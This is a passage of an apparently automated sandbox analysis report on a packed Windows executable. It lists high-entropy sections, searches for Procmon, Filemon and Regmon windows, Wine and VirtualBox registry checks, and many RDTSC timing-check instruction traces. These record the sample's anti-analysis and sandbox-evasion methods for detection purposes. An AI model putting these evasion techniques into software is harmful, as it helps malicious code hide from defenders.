              Source: file.exeStatic PE information: Raw size of fpcukdxy is bigger than: 0x100000 < 0x198600
              Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: file.exe, 00000000.00000003.1607549423.0000000008020000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1682977951.0000000005F02000.00000040.00000800.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.140000.0.unpack :EW;.rsrc :W;.idata :W; :EW;fpcukdxy:EW;qisnsufv:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;fpcukdxy:EW;qisnsufv:EW;.taggant:EW;
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: file.exeStatic PE information: real checksum: 0x1c7e56 should be: 0x1c386a
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .rsrc
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: fpcukdxy
              Source: file.exeStatic PE information: section name: qisnsufv
              Source: file.exeStatic PE information: section name: .taggant
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00F7CDA1 push edx; iretd 0_3_00F7CDA2
              Source: file.exeStatic PE information: section name: entropy: 7.973721758496147
              Source: file.exeStatic PE information: section name: fpcukdxy entropy: 7.954084488701993

              Boot Survival

              barindex
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\file.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3183A6 second address: 3183D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 pop eax 0x00000008 js 00007FE9047A81F1h 0x0000000e jp 00007FE9047A81D7h 0x00000014 push eax 0x00000015 push edx 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3183D1 second address: 3183D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3183D5 second address: 3183D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31851C second address: 318539 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE90543D6C5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 318539 second address: 318544 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3189A6 second address: 3189BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007FE90543D6C2h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3189BF second address: 3189C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31ABC7 second address: 31ABCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31ABCB second address: 31ABE4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FE9047A81D1h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31ABE4 second address: 31ABE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31ABE8 second address: 31AC2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov di, 6D9Ah 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push ebp 0x00000013 call 00007FE9047A81C8h 0x00000018 pop ebp 0x00000019 mov dword ptr [esp+04h], ebp 0x0000001d add dword ptr [esp+04h], 0000001Ah 0x00000025 inc ebp 0x00000026 push ebp 0x00000027 ret 0x00000028 pop ebp 0x00000029 ret 0x0000002a sub dword ptr [ebp+122D1DA0h], esi 0x00000030 call 00007FE9047A81C9h 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 push esi 0x0000003a pop esi 0x0000003b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31AC2F second address: 31AC35 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31AD28 second address: 31AD7C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9047A81CCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 79BAF550h 0x00000010 push ecx 0x00000011 sub ecx, dword ptr [ebp+122D2A77h] 0x00000017 pop edi 0x00000018 lea ebx, dword ptr [ebp+124528DDh] 0x0000001e cld 0x0000001f xchg eax, ebx 0x00000020 pushad 0x00000021 jmp 00007FE9047A81CAh 0x00000026 push edx 0x00000027 jne 00007FE9047A81C6h 0x0000002d pop edx 0x0000002e popad 0x0000002f push eax 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007FE9047A81D6h 0x00000037 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31AD7C second address: 31AD82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 339504 second address: 33950B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 33950B second address: 339526 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE90543D6BBh 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 339526 second address: 33952C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 339644 second address: 33967D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ecx 0x00000008 jmp 00007FE90543D6C7h 0x0000000d pop ecx 0x0000000e pushad 0x0000000f jmp 00007FE90543D6C6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 33967D second address: 339688 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 339688 second address: 339692 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FE90543D6B6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 339692 second address: 339696 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 339696 second address: 3396C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE90543D6C4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FE90543D6C1h 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 339826 second address: 339869 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9047A81CEh 0x00000007 push edx 0x00000008 jno 00007FE9047A81C6h 0x0000000e pushad 0x0000000f popad 0x00000010 pop edx 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push edx 0x00000016 jmp 00007FE9047A81D7h 0x0000001b pop edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FE9047A81CAh 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 339869 second address: 339875 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FE90543D6B6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 339875 second address: 33988D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FE9047A81D3h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 339DBC second address: 339DC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 339DC2 second address: 339DC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 339DC6 second address: 339DDD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FE90543D6C1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 339DDD second address: 339E0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007FE9047A81D7h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f je 00007FE9047A81C6h 0x00000015 jng 00007FE9047A81C6h 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 339F88 second address: 339F91 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 33A0D6 second address: 33A0DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 33A0DD second address: 33A10B instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FE90543D6CFh 0x00000008 jmp 00007FE90543D6C3h 0x0000000d jng 00007FE90543D6B6h 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FE90543D6BBh 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 33A23F second address: 33A245 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3306DD second address: 3306E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3306E5 second address: 330707 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 pop esi 0x00000009 jmp 00007FE9047A81D6h 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 33A6D2 second address: 33A6D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 33AC86 second address: 33AC8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 33AC8B second address: 33ACD3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE90543D6C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jp 00007FE90543D6CCh 0x00000011 jmp 00007FE90543D6C3h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 33ADFA second address: 33ADFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 33ADFE second address: 33AE13 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FE90543D6BAh 0x0000000b pop esi 0x0000000c push esi 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 33AF6A second address: 33AF86 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9047A81D8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 33AF86 second address: 33AF96 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FE90543D6C2h 0x00000008 jl 00007FE90543D6B6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 33B393 second address: 33B39F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jl 00007FE9047A81C6h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 33D9F2 second address: 33D9FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 33D9FA second address: 33DA0A instructions: 0x00000000 rdtsc 0x00000002 jg 00007FE9047A81C6h 0x00000008 jo 00007FE9047A81C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 33DA0A second address: 33DA0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 33DA0F second address: 33DA51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FE9047A81C6h 0x0000000a pop eax 0x0000000b jmp 00007FE9047A81D0h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 jng 00007FE9047A81FCh 0x00000018 jbe 00007FE9047A81E3h 0x0000001e jmp 00007FE9047A81D7h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 33FCD4 second address: 33FCE2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jc 00007FE90543D6B6h 0x0000000d pop ebx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 33FCE2 second address: 33FCE9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 342FE1 second address: 342FFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE90543D6C9h 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 342FFF second address: 343005 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 343005 second address: 343009 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34341B second address: 343428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 343428 second address: 343431 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34366F second address: 343673 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 343673 second address: 343677 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 345E3C second address: 345E64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE9047A81CAh 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c pushad 0x0000000d popad 0x0000000e push esi 0x0000000f pop esi 0x00000010 popad 0x00000011 push eax 0x00000012 pushad 0x00000013 popad 0x00000014 pop eax 0x00000015 popad 0x00000016 jng 00007FE9047A81D2h 0x0000001c pushad 0x0000001d push ebx 0x0000001e pop ebx 0x0000001f pushad 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30410F second address: 304113 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 304113 second address: 304156 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FE9047A81D1h 0x0000000c jnc 00007FE9047A81C6h 0x00000012 js 00007FE9047A81C6h 0x00000018 push esi 0x00000019 pop esi 0x0000001a popad 0x0000001b jl 00007FE9047A81CEh 0x00000021 push edx 0x00000022 pop edx 0x00000023 jnp 00007FE9047A81C6h 0x00000029 popad 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007FE9047A81CBh 0x00000031 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 304156 second address: 30415C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34BA58 second address: 34BA5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34BA5C second address: 34BA62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34BA62 second address: 34BAA0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jng 00007FE9047A81C6h 0x00000009 jnl 00007FE9047A81C6h 0x0000000f pop ebx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 jp 00007FE9047A81C6h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f jno 00007FE9047A81C6h 0x00000025 push edx 0x00000026 pop edx 0x00000027 jc 00007FE9047A81C6h 0x0000002d pushad 0x0000002e popad 0x0000002f popad 0x00000030 jmp 00007FE9047A81CEh 0x00000035 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34B1E1 second address: 34B209 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FE90543D6C4h 0x0000000c jmp 00007FE90543D6BDh 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34B209 second address: 34B20D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34B20D second address: 34B218 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34B713 second address: 34B718 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34E221 second address: 34E226 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34E226 second address: 34E22C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34E3AC second address: 34E3B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34E5CC second address: 34E5E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9047A81D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34E5E0 second address: 34E5E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34EB33 second address: 34EB54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jns 00007FE9047A81C6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebx 0x0000000f mov di, 47C9h 0x00000013 nop 0x00000014 pushad 0x00000015 push esi 0x00000016 jnp 00007FE9047A81C6h 0x0000001c pop esi 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34ED11 second address: 34ED1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FE90543D6B6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34EE1E second address: 34EE41 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9047A81D8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34EE41 second address: 34EE47 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 350066 second address: 35007C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE9047A81D2h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35007C second address: 3500F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE90543D6C2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007FE90543D6B8h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 00000015h 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 mov si, dx 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push eax 0x00000030 call 00007FE90543D6B8h 0x00000035 pop eax 0x00000036 mov dword ptr [esp+04h], eax 0x0000003a add dword ptr [esp+04h], 0000001Ah 0x00000042 inc eax 0x00000043 push eax 0x00000044 ret 0x00000045 pop eax 0x00000046 ret 0x00000047 mov si, bx 0x0000004a push 00000000h 0x0000004c mov si, bx 0x0000004f xchg eax, ebx 0x00000050 pushad 0x00000051 jns 00007FE90543D6B8h 0x00000057 push eax 0x00000058 push edx 0x00000059 pushad 0x0000005a popad 0x0000005b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3500F1 second address: 3500F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
